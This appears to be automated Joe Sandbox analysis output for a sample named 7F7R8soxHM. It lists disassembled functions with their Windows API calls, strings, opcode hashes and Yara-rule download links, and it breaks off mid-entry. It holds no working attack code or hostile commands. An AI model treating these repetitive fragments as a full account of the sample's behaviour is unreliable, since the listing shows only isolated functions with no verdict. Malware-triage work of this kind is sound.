Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 10c1a5276cf7888eb0f902725587b521009064e471e83919db50294d31ca25a8
Instruction ID: e1b64bf11ef9c789051ff0ea40b1c002a282dfc80735e9eb47fa8bca2cff6117
Opcode Fuzzy Hash: 10c1a5276cf7888eb0f902725587b521009064e471e83919db50294d31ca25a8
Instruction Fuzzy Hash: ED0121B26052067BE505A6124D45FAF73AC9F11398F185059FE08B7283E752DE1292F1

Function 00ED4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00ED4D5C
__beginthreadex.LIBCMT ref: 00ED4D7A
MessageBoxW.USER32(?,?,?,?), ref: 00ED4D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00ED4DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00ED4DAC

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 594b73dddefc21d77fc4b174188db5aa26e98904076828dc24578b88e405049a
Instruction ID: 87c8b2faa21d99560007b0115bd14da1e9424129caafe016feca5d24dfa9b731
Opcode Fuzzy Hash: 594b73dddefc21d77fc4b174188db5aa26e98904076828dc24578b88e405049a
Instruction Fuzzy Hash: 0F1108B2904208BFCB019BA89C08EEB7FADEB99324F144266FD14E3391D671CD05C7A0

Function 00EC874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8766
GetLastError.KERNEL32(?,00EC822A,?,?,?), ref: 00EC8770
GetProcessHeap.KERNEL32(00000008,?,?,00EC822A,?,?,?), ref: 00EC877F
HeapAlloc.KERNEL32(00000000,?,00EC822A,?,?,?), ref: 00EC8786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC879D

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 4803301a0849488dee631f9ed521e659a7974c24b59d806d8dd96807b4e62206
Instruction ID: d6abcb45edd9aca1c3856f0e48b1fed21449eb52124d193ee5cece57c4f3ded9
Opcode Fuzzy Hash: 4803301a0849488dee631f9ed521e659a7974c24b59d806d8dd96807b4e62206
Instruction Fuzzy Hash: 5C016271601204FFDB104FA6DE88DB77B6CFF853557201439F949E2260DA328C15CA60

Function 00ED54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED5502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00ED5510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED5518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00ED5522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED555E

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 740d1ff27eb8d7cfcffcb961cb4e886cc3d0fb47cbde87747d77dceac7cbb424
Instruction ID: 5cc83cfb56d5228166632cf500b74e3891ad878137192519c90ceeb43f5bed19
Opcode Fuzzy Hash: 740d1ff27eb8d7cfcffcb961cb4e886cc3d0fb47cbde87747d77dceac7cbb424
Instruction Fuzzy Hash: 63015732D01A29DBCF00EFE9E888AEDBB79FF49701F410066E901B2241DB309655C7A1

Function 00EC7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?,?,00EC799D), ref: 00EC766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC7698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?), ref: 00EC76A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC76B4

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 38efce7ae823c843a0f6347018bde03fcb599d4793165def6d65150bbf9c0153
Instruction ID: 380c33b811b4c9fd01fa2130c3476aab4f9d8ac612a057e8a08db7338cf51d65
Opcode Fuzzy Hash: 38efce7ae823c843a0f6347018bde03fcb599d4793165def6d65150bbf9c0153
Instruction Fuzzy Hash: 4701B1B2601604AFDB104F19DD44FAA7FACEF84795F100028FD44E2211EB32DD01DBA0

Function 00EC85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EC8608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EC8612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EC8621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EC8628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EC863E

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 4d77caf60dfde2a5223c1d871fe6b3e54cbedcee97390adb2c3401cd55c1e588
Instruction ID: df947a78985c2151f85928ef0c02e90d1006f064ff6fda4e55e7850fe31d1aad
Opcode Fuzzy Hash: 4d77caf60dfde2a5223c1d871fe6b3e54cbedcee97390adb2c3401cd55c1e588
Instruction Fuzzy Hash: 23F04F31201204BFEB104FA6DE89F7B3BACEFC9758B405429F945E6250CB61DC46DA60

Function 00EC8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EC8669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC869F

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 8a73d73e4b41dc43827d74ad2e67d5b0c889d8f9cbe6d31b8211bf6205b71494
Instruction ID: 8f5567f4aea2ba4100f008905095298470561458db123dd6d953b4c6ea44dcdf
Opcode Fuzzy Hash: 8a73d73e4b41dc43827d74ad2e67d5b0c889d8f9cbe6d31b8211bf6205b71494
Instruction Fuzzy Hash: 15F04F71201204AFEB111FA6EE88FB73BACEF89B58B100039F945E6150CF61D955DA60

Function 00ECC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00ECC6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 00ECC6D1
MessageBeep.USER32(00000000), ref: 00ECC6E9
KillTimer.USER32(?,0000040A), ref: 00ECC705
EndDialog.USER32(?,00000001), ref: 00ECC71F

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: f98e7e7c6fff17bfcab81abfdd3116a7122959ccf5345c69b8e8c9de76b089ea
Instruction ID: a166cff5629ee4229cb33987c02a8029b7babb888e5a422ed8a93a65bfe15125
Opcode Fuzzy Hash: f98e7e7c6fff17bfcab81abfdd3116a7122959ccf5345c69b8e8c9de76b089ea
Instruction Fuzzy Hash: 40014F30500704ABEB215B21DE4EFA677B8FF44B05F10166EF586F14E1DBE1A959CA80

Function 00E713B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00E713BF
StrokeAndFillPath.GDI32(?,?,00EABAD8,00000000,?), ref: 00E713DB
SelectObject.GDI32(?,00000000), ref: 00E713EE
DeleteObject.GDI32 ref: 00E71401
StrokePath.GDI32(?), ref: 00E7141C

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 7946ce3ba0f5eac1d9d28cc25abfe019410ee3c06b241214fdf5b7ec3a80ded1
Instruction ID: 4a05214394a8c87ce34a678e13b17ce685fb38629a5fe180356dce0a3add5977
Opcode Fuzzy Hash: 7946ce3ba0f5eac1d9d28cc25abfe019410ee3c06b241214fdf5b7ec3a80ded1
Instruction Fuzzy Hash: 72F0B230004308BFDB115F2AEC48B683BA6AF4533AF04D265E569A50B1DB318999EF60

Function 00EDC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00EDC69D
CoCreateInstance.OLE32(00F02D6C,00000000,00000001,00F02BDC,?), ref: 00EDC6B5

Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82

CoUninitialize.OLE32 ref: 00EDC922

Strings

.lnk, xrefs: 00EDC631, 00EDC659, 00EDC663

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 3d4a08cb73d1c808b6f4848c97be80e3a59cf41874d8a67346bcc55c855f3bf5
Instruction ID: bf73c60a0c91cda6b9079d084fd0de7097f0a9b8e6a7a752f65c1e629a3befc3
Opcode Fuzzy Hash: 3d4a08cb73d1c808b6f4848c97be80e3a59cf41874d8a67346bcc55c855f3bf5
Instruction Fuzzy Hash: 72A13D71104205AFD304EF54C891EABB7F8FF95304F00992DF19AA71A2DB70EA49CB52

Function 00E82E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00E90FF6: std::exception::exception.LIBCMT ref: 00E9102C
Part of subcall function 00E90FF6: __CxxThrowException@8.LIBCMT ref: 00E91041

Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82

Part of subcall function 00E77BB1: _memmove.LIBCMT ref: 00E77C0B

__swprintf.LIBCMT ref: 00E8302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E82EC6

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: a2a6982abda716948deefb2445e2a16e5c1343202194228d49724a7071971272
Instruction ID: 6c7219910231e755ca9a8b722177cb4f71425ec7ec106101b549e4807d7177c0
Opcode Fuzzy Hash: a2a6982abda716948deefb2445e2a16e5c1343202194228d49724a7071971272
Instruction Fuzzy Hash: 54916D722083019FCB18FF24D885CAFB7E4EF85754F00691DF499A72A1DA60EE44CB52

Function 00EDBBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E748A1,?,?,00E737C0,?), ref: 00E748CE

CoInitialize.OLE32(00000000), ref: 00EDBC26
CoCreateInstance.OLE32(00F02D6C,00000000,00000001,00F02BDC,?), ref: 00EDBC3F
CoUninitialize.OLE32 ref: 00EDBC5C

Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C

Strings

.lnk, xrefs: 00EDBC08, 00EDBC16

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 1d875b4bcf47806565ebe99f455fa22045257801d10543539a45f1183b556f44
Instruction ID: aafa68d7d861702f24c0f2d11d8b582045ae5743438a70407ce2b2962df2dd6e
Opcode Fuzzy Hash: 1d875b4bcf47806565ebe99f455fa22045257801d10543539a45f1183b556f44
Instruction Fuzzy Hash: 6FA166756043019FCB04DF14C484D6ABBE5FF88324F158999F899AB3A2DB31ED46CB92

Function 00E9524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00E952DD

Part of subcall function 00EA0340: __87except.LIBCMT ref: 00EA037B

Strings

pow, xrefs: 00E952B5, 00E952D2

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 3ad570f3aac681859ad0475360c1277d025d52d689ba60d8cc36807a34c8045d
Instruction ID: 6e221f35f77111655701e6a549f1ac5bce261847866fb81ffc46006812d63613
Opcode Fuzzy Hash: 3ad570f3aac681859ad0475360c1277d025d52d689ba60d8cc36807a34c8045d
Instruction Fuzzy Hash: 8C518022E0D70587DF12B714C95137E3BD0AB0A354F20BD98F495691E9DF74ACC49B46

Function 00E9023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 00E90277
#, xrefs: 00E90280

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 7532a75866019653925e415cf81d782defc533dfaf4e537e304fd7fc313f548a
Instruction ID: 5a15b53212221c1da567b92a4ed911fc0e661ddd59de3278d889c1a5b1b0aaf8
Opcode Fuzzy Hash: 7532a75866019653925e415cf81d782defc533dfaf4e537e304fd7fc313f548a
Instruction Fuzzy Hash: 5A51FF765043468FCF15DF28C488AFA7BA4EF55314F945059EC92BB2A0D731AD82CB61

Function 00E83297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E833D7
_memmove.LIBCMT ref: 00E83470
_free.LIBCMT ref: 00E83496
_memmove.LIBCMT ref: 00E83549

Strings

Oa, xrefs: 00E83482

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _memmove$_free
String ID: Oa
API String ID: 2620147621-3945284152
Opcode ID: fd5d63869f224449df5228429873c8b554f0fa4e5bf788d7286f5579351c56df
Instruction ID: ee66ca4714bf7b9e4326760c9643cf2e3c05d07934ea2fa907213042bbc89798
Opcode Fuzzy Hash: fd5d63869f224449df5228429873c8b554f0fa4e5bf788d7286f5579351c56df
Instruction Fuzzy Hash: C25178B16083419FDB24DF28C481A6BBBE5AF85704F04582DE98DA7361EB31E901CB82

Function 00E862F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E863A8
_memmove.LIBCMT ref: 00E86446
_memset.LIBCMT ref: 00E8646A

Strings

ERCP, xrefs: 00E86313

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: be786112ba686ba70f2392e9bac98238b7b82677b318e7778efb620ae8905b4c
Instruction ID: 9d5d73183f0ba87cfd0b35288a21d3eaa16ace3e9e09b6d8141329ef4d480e10
Opcode Fuzzy Hash: be786112ba686ba70f2392e9bac98238b7b82677b318e7778efb620ae8905b4c
Instruction Fuzzy Hash: 5A51C2719003099FCB24DF64C881BAEBBF4FF04318F24956EE95EEA241E7759581CB40

Function 00EF7BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00EFF910,00000000,?,?,?,?), ref: 00EF7C4E
GetWindowLongW.USER32 ref: 00EF7C6B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EF7C7B

Strings

SysTreeView32, xrefs: 00EF7C20

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: afff8c6656f8b9ace8244b72fad79a7df13c6a42d5b072e514246120851d5b18
Instruction ID: abb2f93322bcae1bf9b5f4f2287c9d1848cf28dfbe86d65cd29664d98de43bde
Opcode Fuzzy Hash: afff8c6656f8b9ace8244b72fad79a7df13c6a42d5b072e514246120851d5b18
Instruction Fuzzy Hash: D7318031204209ABDB118E38DC41BEA77A9EF49328F245725FAB9F32E0D731E8519B50

Function 00EF7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EF76D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EF76E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 00EF7708

Strings

SysMonthCal32, xrefs: 00EF769B

Memory Dump Source

